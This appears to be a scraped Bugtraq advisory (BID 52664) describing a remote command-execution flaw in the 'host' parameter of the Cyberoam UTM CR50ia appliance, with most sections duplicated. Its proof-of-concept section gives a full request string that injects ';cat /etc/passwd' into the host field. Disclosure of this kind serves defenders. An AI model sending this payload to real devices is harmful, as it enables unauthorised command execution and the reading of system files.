Cyberoam UTM 'host' Parameter Remote Command Execution Vulnerability
BID:52664
Info
Cyberoam UTM 'host' Parameter Remote Command Execution Vulnerability
| Bugtraq ID: | 52664 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 21 2012 12:00AM |
| Updated: | Mar 21 2012 12:00AM |
| Credit: | Saurabh Harit |
| Vulnerable: |
Elitecore Technologies Cyberoam UTM CR50ia 10.01.0 build 678 |
| Not Vulnerable: | |
Discussion
Cyberoam UTM 'host' Parameter Remote Command Execution Vulnerability
Cyberoam UTM is prone to a remote command-execution vulnerability because the appliance fails to adequately sanitize user-supplied input.
Successful exploitation may allow an attacker to execute arbitrary commands and completely compromise the device.
Cyberoam UTM is prone to a remote command-execution vulnerability because the appliance fails to adequately sanitize user-supplied input.
Successful exploitation may allow an attacker to execute arbitrary commands and completely compromise the device.
Exploit / POC
Cyberoam UTM 'host' Parameter Remote Command Execution Vulnerability
An attacker can exploit this issue using a browser.
The following input is available:
__RequestType=ajax&mode=758&tool=1&interface=&host=127.0.0.1 -c 1;cat /etc/passwd&pingipfqdn=127.0.0.1&size=&tracerouteipfqdn=&namelookupipfqdn=&dns=&routelookupipfqdn=&pinginterface=&tracerouteinterface=&selectdns=10.0.0.5&
An attacker can exploit this issue using a browser.
The following input is available:
__RequestType=ajax&mode=758&tool=1&interface=&host=127.0.0.1 -c 1;cat /etc/passwd&pingipfqdn=127.0.0.1&size=&tracerouteipfqdn=&namelookupipfqdn=&dns=&routelookupipfqdn=&pinginterface=&tracerouteinterface=&selectdns=10.0.0.5&
Solution / Fix
Cyberoam UTM 'host' Parameter Remote Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
References
Cyberoam UTM 'host' Parameter Remote Command Execution Vulnerability
References:
References:
- Cyberoam CR50ia UTM Appliance Product Page (Elitecore Technologies)
- Cyberoam Unified Threat Management: OS Command Execution (Saurabh Harit)
- Cyberoam UTM Homepage (Elitecore Technologies)